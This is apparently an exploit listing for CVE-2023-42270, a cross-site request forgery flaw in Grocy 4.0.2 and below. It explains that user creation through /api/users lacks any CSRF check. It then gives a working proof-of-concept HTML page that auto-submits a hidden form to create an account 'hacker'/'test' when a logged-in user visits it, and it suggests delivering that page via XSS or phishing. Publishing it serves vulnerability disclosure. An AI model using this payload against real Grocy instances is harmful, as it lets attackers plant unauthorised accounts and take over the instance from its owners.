Headline
Grocy 4.0.2 Cross Site Request Forgery
Grocy versions 4.0.2 and below suffer from a cross site request forgery vulnerabilities.
# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability# Application: Grocy# Version: <= 4.0.2# Date: 09/21/2023# Exploit Author: Chance Proctor# Vendor Homepage: https://grocy.info/# Software Link: https://github.com/grocy/grocy# Tested on: Linux# CVE : CVE-2023-42270Overview==================================================When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.Proof of Concept==================================================Host the following html code via a XSS or delivery via a phishing campaign: <html> <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded"> <input name='username' value='hacker' type='hidden'> <input name='password' value='test' type='hidden'> <input type=submit> </form> <script> history.pushState('','', '/'); document.forms[0].submit(); </script> </html>If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials Username: hacker Password: testNote:In order for this to work, the target must have Create User Permissions.This is enabled by default.Proof of Exploit/Reproduce==================================================http://xploit.sh/posts/cve-2023-42270/
Related news
CVE-2023-42270
Grocy <= 4.0.2 is vulnerable to Cross Site Request Forgery (CSRF).